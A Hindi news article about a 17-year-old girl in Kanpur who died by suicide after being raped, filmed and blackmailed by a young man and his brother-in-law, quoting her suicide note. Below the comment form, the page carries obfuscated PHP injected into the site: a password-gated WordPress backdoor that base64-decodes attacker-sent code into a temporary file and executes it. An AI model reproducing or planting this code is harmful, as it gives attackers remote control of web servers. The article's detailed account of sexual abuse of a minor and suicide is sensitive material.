जीजा-साले ने दुष्कर्म कर बनाया वीडियो, ब्लैकमेलिंग से परेशान किशोरी ने दी जान, सुसाइड नोट में लिखी ये बात

Uttarakhand Press 14 September 2023: कानपुर के रावतपुर थाना क्षेत्र में युवक ने किशोरी को प्रेमजाल में फांसकर दुष्कर्म कर उसका वीडियो बना लिया। इसके बाद वह वीडियो अपने बहनोई को दे दिया। उस वीडियो के जरिये बहनोई ने भी ब्लैकमेल कर किशोरी को अपनी हवस का शिकार बनाया। इसके बाद दोनों अक्सर उससे दुष्कर्म करने लगे।

इससे तंग आकर किशोरी ने सुसाइड नोट लिखकर जहरीला पदार्थ खाकर जान दे दी। पुलिस ने सुसाइड नोट व मोबाइल कब्जे में लेकर शव को पोस्टमार्टम के लिए भेज दिया। रावतपुर थाना क्षेत्र निवासी पत्थर घिसाई का काम करने वाले की बेटी हाईस्कूल पास करने के बाद घर में ही मां के काम में हाथ बंटाती थी।

उन्होंने बताया कि पिछले साल घाटमपुर कुरसेठा में वह परिवार संग एक शादी में गए थे। यहां एक युवक ने उसकी 17 वर्षीय बेटी से दोस्ती कर ली। इसके बाद दोनों में बातचीत शुरू हो गई। इस बीच युवक ने उनकी बेटी को प्रेमजाल में फंसाकर दुष्कर्म कर वीडियो बना लिया। फिर वही वीडियो अपने बहनोई को दे दिया।

बेटी ने खा लिया था जहर:
इसके बाद उसका बहनोई भी वीडियो को सोशल मीडिया पर वायरल करने की धमकी देकर बेटी से दुष्कर्म करता रहा। जीजा और साले के ब्लैकमेलिंग से तंग आकर मां से शिकायत की थी। मंगलवार को पत्नी छोटी बेटी को स्कूल लेने गई थी और वह काम पर गए थे। इसी बीच बेटी ने जहर खा लिया। हैलट में बेटी को मृत घोषित कर दिया गया।

घर बुलाकर मारा-पीटा, कान से आने लगा था खून:
किशोरी ने सुसाइड नोट में लिखा है कि आरोपी जीजा और युवक ने घर बहाने से बुला लिया। यहां उसके घरवालों ने मारापीटा। इससे उसके कान से खून निकलने लगा था। युवक और उसके परिवार वाले दुष्कर्म का वीडियो वायरल करने की धमकी दे रहे थे।

मम्मी-पापा मुझे माफ कर देना:
सुसाइड नोट में किशोरी ने लिखा है कि मम्मी-पापा मुझे माफ कर देना। आप लोगों की कोई गलती नहीं। आप ने हमेशा मेरा साथ दिया। आप सबको भी बहुत दुख दिया है मैंने। सॉरी मेरी छोटी बहन माफ कर देना। मेरी मौत के जिम्मेदार युवक और उसके घर वाले हैं। युवक के झूठ और टॉर्चर की वजह से वह अपनी जान दे रही है।

दहशत में सहमी रही किशोरी:
परिवार के लोगों ने बताया कि घटना के बाद उनकी बेटी लगातार घुट-घुटकर जी रही थी। काफी समय तक इस कांड को लोकलाज की वजह से घर वालों से छिपाए रखा, लेकिन जब जीजा साले ने ज्यादा परेशान करने के साथ शोषण की इंतहा पार की तो परिजनों को घटना की जानकारी दी। इसके बाद किशोरी घर में डरी और सहमी रहती थी।

दोनों पक्षों में हुआ था लिखित समझौता:
परिजनों ने बताया कि बेटी ने इस घटना की जानकारी उन लोगों को दी तो इसकी शिकायत युवक के परिजनों से की। इसके बाद इस मामले को पुलिस में जाने की बात कही। तो वे लोग किशोरी के बालिग होने पर शादी कर लेने की बात करने लगे। इस दौरान थाना पुलिस न करके दोनों पक्षों में लिखित में समझौता हो गया था। 24 अगस्त को द शादी होनी थी।

किशोरी ने आत्महत्या की है। सुसाइड नोट भी बरामद हुआ है। उसमें जो भी आरोप लगाए गए हैं, उसकी जांच कर आरोपियों के विरुद्ध कार्रवाई की जाएगी।

Read Previous

PM Modi: प्रधानमंत्री नरेंद्र मोदी आज मध्य प्रदेश और छत्तीसगढ़ को देंगे 57,000 करोड़ रुपये की सौगात, जाने पूरी बात

Read Next

Uttarakhand Road Accident: ज्वालापुर में हाईवे किनारे खड़े ट्रक में वाहन की टक्कर, हादसे में लोडर चालक की मौत

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}